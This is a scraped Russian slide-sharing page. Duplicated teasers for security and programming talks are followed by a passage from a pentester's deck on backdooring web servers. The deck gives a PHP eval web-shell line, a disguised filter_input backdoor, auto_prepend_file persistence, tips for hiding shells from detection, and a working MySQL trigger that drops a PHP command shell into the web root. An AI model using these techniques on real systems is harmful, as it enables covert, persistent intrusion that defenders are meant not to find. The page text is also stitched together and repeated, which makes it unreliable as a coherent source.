Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТПPositive Hack Days
Защищенность систем АСУ ТП и SCADA после массового распространения червя Stuxnet стали любимой страшилкой журналистов и страшным сном для всех, кто связан с промышленностью и национальной безопасностью. Насколько защищены системы АСУ ТП в России и в мире? Защита АСУ ТП - дань моде или насущная необходимость? Насколько тяжело найти уязвимость в SCADA? Какие векторы атак для этих систем наиболее опасны? Регулирование в области безопасности АСУ ТП - миф или реальность?
Ведущий: Владимир Иванов и Сергей Гордейчик
Эксперт ИТ и исследователь кибербезопасности поделятся своим взглядом на проблему современных целевых атак, спонсируемых государствами и криминальными группировками. Докладчики расскажут об эффективности существующих подходов к защите, о способах обхода песочницы, и о том, пора ли IDS и AV отправляться на свалку.
Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТПPositive Hack Days
Защищенность систем АСУ ТП и SCADA после массового распространения червя Stuxnet стали любимой страшилкой журналистов и страшным сном для всех, кто связан с промышленностью и национальной безопасностью. Насколько защищены системы АСУ ТП в России и в мире? Защита АСУ ТП - дань моде или насущная необходимость? Насколько тяжело найти уязвимость в SCADA? Какие векторы атак для этих систем наиболее опасны? Регулирование в области безопасности АСУ ТП - миф или реальность?
Ведущий: Владимир Иванов и Сергей Гордейчик
Эксперт ИТ и исследователь кибербезопасности поделятся своим взглядом на проблему современных целевых атак, спонсируемых государствами и криминальными группировками. Докладчики расскажут об эффективности существующих подходов к защите, о способах обхода песочницы, и о том, пора ли IDS и AV отправляться на свалку.
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...DefconRussia
Мои последние исселодования показали, что у SharePoint есть определенное количество вэб сервисов, которые могут помочь аудитору собрать крайне полезную информацию с сайта (списки пользователей, групп, ролей и т д). Также данные сервисы, в комбинации с хранимыми XSS, могут быть использованы для вертикального повышения привилегий или предоставить информацию для компрометации доменных записей AD.
Работа с ошибками. Как ловить исключения и что потом с ними делать (Григорий ...IT-Доминанта
Григорий Петров - Технический евангелист / NPTV / Россия, Москва
В своем докладе Григорий расскажет о том, зачем в программах обрабатывать ошибки, какие они бывают и что нам предлагает python для работы с ними.
http://www.it-sobytie.ru/events/2040
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПОPositive Hack Days
Ведущие: Эмиль Олейников и Юрий Гуркин
Как медицинские, так и SCADA-системы обладают возможностью удаленного управления, настройки и наблюдения. Зачастую их подключают к интернету. В докладе рассказывается об уязвимостях в специализированном ПО, используемом в медицине и промышленности, которые были исследованы с помощью отечественного пентест-фреймворка EAST (exploits and security tools). Аналогично Metasploit, он позволяет автоматизировать и облегчить поиск уязвимостей и иллюстрацию уровня риска.
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...DefconRussia
Мои последние исселодования показали, что у SharePoint есть определенное количество вэб сервисов, которые могут помочь аудитору собрать крайне полезную информацию с сайта (списки пользователей, групп, ролей и т д). Также данные сервисы, в комбинации с хранимыми XSS, могут быть использованы для вертикального повышения привилегий или предоставить информацию для компрометации доменных записей AD.
Работа с ошибками. Как ловить исключения и что потом с ними делать (Григорий ...IT-Доминанта
Григорий Петров - Технический евангелист / NPTV / Россия, Москва
В своем докладе Григорий расскажет о том, зачем в программах обрабатывать ошибки, какие они бывают и что нам предлагает python для работы с ними.
http://www.it-sobytie.ru/events/2040
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПОPositive Hack Days
Ведущие: Эмиль Олейников и Юрий Гуркин
Как медицинские, так и SCADA-системы обладают возможностью удаленного управления, настройки и наблюдения. Зачастую их подключают к интернету. В докладе рассказывается об уязвимостях в специализированном ПО, используемом в медицине и промышленности, которые были исследованы с помощью отечественного пентест-фреймворка EAST (exploits and security tools). Аналогично Metasploit, он позволяет автоматизировать и облегчить поиск уязвимостей и иллюстрацию уровня риска.
Видео: https://www.youtube.com/watch?v=IUtbbN9aevU
Веб-приложения становятся все больше и сложнее, так что многое остается вне нашего поля зрения. Поэтому фреймворки и приложения должны предоставлять дополнительные инструменты, упрощающие разработку и понимание того, что же происходит у них там — «под капотом». В ходе доклада я расскажу о таких инструментах: какими они могут быть, какие задачи решать, что необходимо для их создания.
SPA Meetup, 28 февраля 2015, Москва, Авито
2. WhoAmI
12 лет в информационной безопасности
7 лет пентеста и аудита
Специалист ЦАРКА
Telegram: @alex_bezopasnikov
3. Распространенные типы
- Бекдоры в PHP (шеллы, закладки)
- Бекдоры в MySQL (тригеры)
- Бекдоры в окружении ОС (SUID-ники, bash-
скрипты)
- Бекдоры в бинарном софте (протрояненный
софт)
4. Бекдоры в PHP (закладки)
eval($_REQUEST[cmd]);
НИКОГДА так не делайте
Варианты:
1) Обфусцированный код — плохой вариант
2) Фрагментированная закладка — лучше, но упоротый
3) Логичная закладка, где она будет к месту.
4) Закладка, которую не поймут :)
-- auto_prepend_file — удивительно, но на практике отличный вариант. Нужны
права на правку php.ini (root)
-- filter_input(1,'_',1024,array('options'=>filter_input(1,'__',521)));
И это только примеры. Вариантов сотни
5. Бекдоры в PHP (шеллы)
4 поколения web-шеллов. История
1-е — /cgi-bin/counter.pl?file=|id|. 90-е года
2-е — c99, r57, идеальный WSO. Используют
POST. 00-е года
3-е — Используют GET, передают команды в
HTTP-заголовках. 00-10-е года.
4-е — Используют GET, передают команды в
Cookies. 10-й-???
6. Бекдоры в PHP (шеллы)
МАСКИРОВКА
1) Имя файла (wso.php, shell.php, etc)
2) Время доступа к файлу и директории
3) Расположение файла
4) Сигнатуры файла
7. Бекдоры в MySQL (тригеры)
delimiter |
CREATE TRIGGER backdoor AFTER UPDATE ON users
FOR EACH ROW label:BEGIN
IF (SELECT password FROM users WHERE id=123)='my_shell' THEN
SELECT '<?=`$_REQUEST[„cmd“]`?>' INTO OUTFILE
'/home/site/httpdocs/avators/smile.php';
ELSE
LEAVE label;
END IF;
END;
|